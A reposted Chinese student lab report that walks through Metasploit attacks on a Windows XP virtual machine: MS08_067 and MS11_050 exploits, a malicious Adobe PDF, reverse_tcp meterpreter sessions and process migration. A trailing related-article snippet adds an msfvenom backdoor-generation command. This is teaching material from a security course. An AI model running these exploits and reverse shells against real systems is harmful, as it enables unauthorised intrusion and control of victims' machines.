20145312《网络对抗》MSF基础

最新推荐文章于 2024-11-13 15:25:36 发布
最新推荐文章于 2024-11-13 15:25:36 发布
阅读量96 收藏
点赞数
文章标签: shell 数据库 运维
原文链接:http://www.cnblogs.com/yx20145312/p/6719565.html
版权

20145312《网络对抗》MSF基础

实验要求

1.掌握metasploit的基本应用方式
2.掌握常用的三种攻击方式的思路

实验问答

  • 用自己的话解释什么是exploit、payload、encode
    exploit就相当于是一个运载的工具,将负责攻击的代码传送到靶机中。
    payload也就是负责攻击的代码
    encode也就是编码,它主要有两个功能,一是为了避免之前的payload中出现坏字符,二就是它要伪装从而实现免杀,不让杀毒软件很轻易的就发现payload是攻击代码。

实践过程

MS08_067漏洞渗透攻击实践

  • 实验准备:两台虚拟机,其中一台为kali,一台为windows xp sp3(英文版)
  • 在kali终端输入命令msfconsole进入msf控制台
    885499-20170416173120165-1070968129.png
  • 输入命令search ms08_067,找到的渗透模块,输入命令use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块控制模式,输入命令show payload会显示出有效的攻击载荷,我找到一个shell_reverse_tcp
    885499-20170416173257915-630008575.png
  • 使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷,输入命令set RHOST 192.168.60.133设置靶机IP地址,set RHOST 192.168.60.132设置本机IP地址,输入指令show options查看payload状态
    885499-20170416174056962-758798827.png
  • 输入命令exploit开始攻击
    885499-20170416174311415-408084839.png
  • 在kali上执行ipconfig/all
    885499-20170416174353102-1512726499.png
  • 在win xp上执行同样的命令,如下图所示
    885499-20170416174434368-1276601639.png

MS08_067远程漏洞攻击实践:meterpreter

  • 输入指令use exploit/windows/smb/ms08_067_netapi,进入ms08_067漏洞模块,输入指令set payload windows/meterpreter/reverse_tcp设置payload,输入指令show options,查看payload状态
    885499-20170416175712524-41476211.png
  • 成功攻击结果:
    885499-20170416175745946-1168848370.png

MS11050安全漏洞

  • 输入命令use windows/browser/ms11_050_mshtml_cobjectelement,进入该漏洞模块,设置对应的载荷set payload windows/meterpreter/reverse_tcp,设置相关信息,输入指令exploit,有靶机需要访问的ip地址:http://192.168.60.132:8080/baidu
    885499-20170416180137665-802880008.png
  • 输入命令sessions -i 1,开始连接,攻击成功,获取shell
    885499-20170416180559352-1166315346.png

Adobe阅读器渗透攻击

  • 实验前准备:两台虚拟机,其中一台为kali,一台为windows xp sp3

  • 输入命令use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用,使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷,输入命令show options显示payload状态
    885499-20170416180946727-880698032.png

  • 创建一个pdf文件,设置靶机和本机IP地址,并使用命令show options,看是否设置成功
    885499-20170416181139509-44572011.png
  • 输入exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里。使用use exploit/multi/handler新建一个监听模块,使用set payload windows/meterpreter/reverse_tcp建立一个反向连接,使用命令exploit开始攻击,在xp中打开pdf。这里pdf比较难打开,直接在kali中等结果就可以啦,如下图:
    885499-20170416181645477-1546978339.png
  • 将进程迁移到explorer.exe.使用ps查看当前进程,并找到explorer.exe的进程号,如下图所示,使用命令migrate 1928,输入shell,查看xp靶机信息。
    885499-20170416181706446-516952571.png

  • 在靶机xp中使用命令netstat -an,看本地tcp连接
    885499-20170416181818868-176024196.png

MSF辅助模块应用

  • 先手动创建一个msf所需的数据库service postgresql startmsfdb start,开启msf
    885499-20170416184047399-1576520857.png

  • 输入指令search browser查找浏览器相关应用模块
    885499-20170416184229024-1162379736.png

  • 找到一条关于雅虎通服务端的应用模块(绝对原创,如有雷同,纯属巧合)
    885499-20170416184419681-1901001924.png

  • 进入该应用模块,show options查看需要输入的信息
    885499-20170416184617118-1516214172.png

  • 好的,并没有。exploit命令,打开服务,显示Local IP:http://192.168.169.128:8080/Uj75J3FR 打开浏览器输入该地址。
    885499-20170416185622149-541934438.png

  • kali终端会显示一条发送请求至雅虎通的信息。刷新一次,请求一次。
    885499-20170416185547493-662819130.png

实验体会

  • 前几次实验已经接触过了metasploit监听模块的使用,已然感受到它的功能强大。通过这次ms08_067、ms11_05、Adobe以及辅助模块的实践,对它有了更深刻的认识。也知道了漏洞的存在使我们的操作系统变得很不安全,所以及时更新应用,更新补丁是必要的。

转载于:https://www.cnblogs.com/yx20145312/p/6719565.html

acn19249
关注
网络安全系列&网安实践系列:利用MSF对MYSQL进行简单的UDF提权
weixin_54626591的博客
10-23 49
利用MSF对MYSQL进行简单的UDF提权
linux路径跟踪命令,Linux基础命令---tracepath追踪路由信息
weixin_33833234的博客
04-28 1424
tracepathtracepath指令可以追踪数据到达目标主机的路由信息,同时还能够发现MTU值。它跟踪路径到目的地,沿着这条路径发现MTU。它使用UDP端口或一些随机端口。它类似于Traceroute,只是不需要超级用户特权,并且没有花哨的选项。tracepath 6很好地替代了tracerout 6和Linux错误队列应用程序的典型示例。tracepath的情况更糟,因为商用IP路由器在IC...
linux路径跟踪命令,linux的tracert命令的详细解释
热门推荐
weixin_33514300的博客
04-28 1万+
linux中的使用tracert命令可以跟踪路由路径,下面由秋天网 Qiutian.ZqNF.Com小编为大家整理了linux的tracert命令的详细解释,希望对大家有帮助!linux的tracert命令的详细解释tracert命令详解该诊断实用程序将包含不同生存时间 (ttl) 值的 internet 控制消息协议 (icmp) 回显数据包发送到目标,以决定到达目标采用的路由。要在转发数据包上...
网络对抗技术 20181314 Exp6 MSF基础应用
weixin_46014245的博客
04-26 445
一、原理与实践说明 1.实践原理 2.实践内容概述 3.基础问题回答 二、攻击过程记录 任务一:主动攻击的实践 ms08_067_netapi:自动化漏洞溢出攻击 任务二:攻击浏览器的实践 ms07-017 ms11-050 任务三:攻击客户端的实践 Adobe ms10_046 任务四:成功应用任何一个辅助模块 在ms08_067中应用use auxiliary/scanner/portscan/tcp搜索靶机开放端口 加分项:测试2019年以后的漏洞 三、实验遇到的问题及解决方法 四、离实战还缺些什么技
20155305《网络对抗MSF基础应用
weixin_30827565的博客
04-14 201
20155305《网络对抗MSF基础应用 实验过程 实验系统 靶机1:Windows XP Professional SP2 ,IP地址:192.168.1.108 靶机2:Windows XP Professional SP3 简体中文,IP地址:192.168.1.113 windows XP的虚拟机安装可以在这个网址下载iso镜像,至于序列号就百度吧,会有很多。 Kali IP地址:19...
20155218《网络对抗MSF基础应用
04-17 165
20155218《网络对抗MSF基础应用 实验过程 1、一个主动攻击实践,如ms08_067; 首先使用 search ms08_067查询一下该漏洞; show target 查看可以攻击的目标主机类型; show payloads查看可以选择的攻击载荷,看了一下其等级全为normal,从中找到一个可用的攻击载荷 generic/shell_reverse_tcp 用op...
2018-2019 20165208 网络对抗 Exp5 MSF基础
weixin_34404393的博客
04-12 268
目录 2018-2019 20165208 网络对抗 Exp5 MSF基础 实验内容 基础问题回答 实践过程记录 1.一个主动攻击实践,如ms08_067; 2. 一个针对浏览器的攻击,如ms11_050; 3. 一个针对客户端的攻击,如Adobe;...
20155304《网络对抗MSF基础应用
05-03 242
20155304《网络对抗MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成: 1.1一个主动攻击实践,如ms08_067; 1.2 一个针对浏览器的攻击,如ms11_050; 1.3 一个针对客户端的攻击,如Adobe; 1.4 成功应用任何一个辅助模块。 1.1主动攻击:ms08_067 使用靶机1和Kali 先...
20145327 《网络对抗MSF基础应用
dengnaxun1606的博客
04-15 159
20145327 《网络对抗MSF基础应用 主动攻击ms08_067 两台虚拟机,其中一台为kali,一台为windows xp sp3(英文版) kali ip地址:192.168.43.54 windows xp sp3 ip地址:192.168.43.56 ping通: MS08_067远程漏洞攻击实践:Shell 1.开启msfconsole. 2.输入命令search ...
MSF基础
懂进攻知防守
04-30 1888
本章记录的是MSF基础命令,供学习使用!
msf生成linux shellcode,使用MSF打造各种ShellCode
weixin_39866419的博客
05-13 1019
生成各种后门Windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -opayload.exeLinux:msfvenom -a x86 --pla...
2020年度中职组“网络空间安全赛项”辽宁省竞赛任务书
12-19
通过参与这样的竞赛,中职学生可以全面锻炼自己的网络空间安全技能,包括网络扫描、系统漏洞检测、密码破解、权限提升等,同时也能提升团队合作和现场应变能力,为未来从事网络安全工作打下坚实基础。这样的实践活动...
Electron 项目启动外部可执行文件的几种方式
梵心白莲的博客
11-12 520
本文介绍了在 Electron 项目中使用不同的方法来启动外部可执行文件。使用启动外部可执行文件:适用于需要异步启动子进程并处理标准输入、输出和错误流的情况。使用启动外部可执行文件:适用于执行简单的命令行操作,并等待命令执行完毕后返回结果。使用或启动外部可执行文件:适用于不需要与外部进程进行交互的情况。使用启动外部 Node.js 脚本:适用于启动新的 Node.js 进程并进行进程间通信。
IC脚本之shell
xusong666的博客
11-13 141
3. test表达式。
XshellShell的相关介绍与Linux中的权限问题
2301_81265915的博客
11-09 727
首先,先介绍一下我们学习Linux的工具:XshellXShell 是一个流行的 Windows 平台上的 SSH、Telnet 和 Rlogin 客户端,主要用于远程连接 Linux/Unix 系统。它的运行原理大致如下:1:协议支持: XShell 支持多种远程协议(如 SSH、Telnet、Rlogin 等)。最常用的是 SSH 协议,它提供了安全的加密通信。SSH(Secure Shell)通过加密对客户端和服务器之间的通信进行保护,以防止数据在网络中被窃听和篡改。2:建立连接。
Shell 变量
m0_56065966的博客
11-13 596
轻松学习Shell 变量
右键创建cmd
sinat_38424109的博客
11-09 230
="此处打开终端"@="此处打开终端"@="此处打开终端"
Linux自定义终端提示符
最新发布
Lenn Louis' Scribe
11-13 535
序列 显示值\a\d\h\H\j\l\n\r\s\t\T\@\A\u\v\V\w\W\#\$\[\]
FFmpeg在Windows上使用MSYS2编译动态库以及报错解决
qq_42838399的博客
11-10 1123
然后在同级目录创建build-ffmpeg.txt文本写入以下内容后更改后缀为build-ffmpeg.sh。在安装目录下找到mingw64.exe双击打开shell(如果是32位的就打开mingw32.exe)然后在同级目录创建build-x264.txt文本写入以下内容后更改后缀为build-x264.sh。在FFmpeg源码同级目录创建编译结果输出文件夹FFmpeg_install。然后在mingw64的shell中中cd到脚本目录下。然后在mingw64的shell中cd到脚本目录下。
内网MSF基础:PostgreSQL配置与权限管理教程
MSF是一个广泛应用于渗透测试和网络安全的开源工具集,本文首先着重于如何在内网环境中设置和管理PostgreSQL数据库,因为MSF依赖于它来存储数据和配置。 1. **配置PostgreSQL**: - 安装PostgreSQL:通过apt-get...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值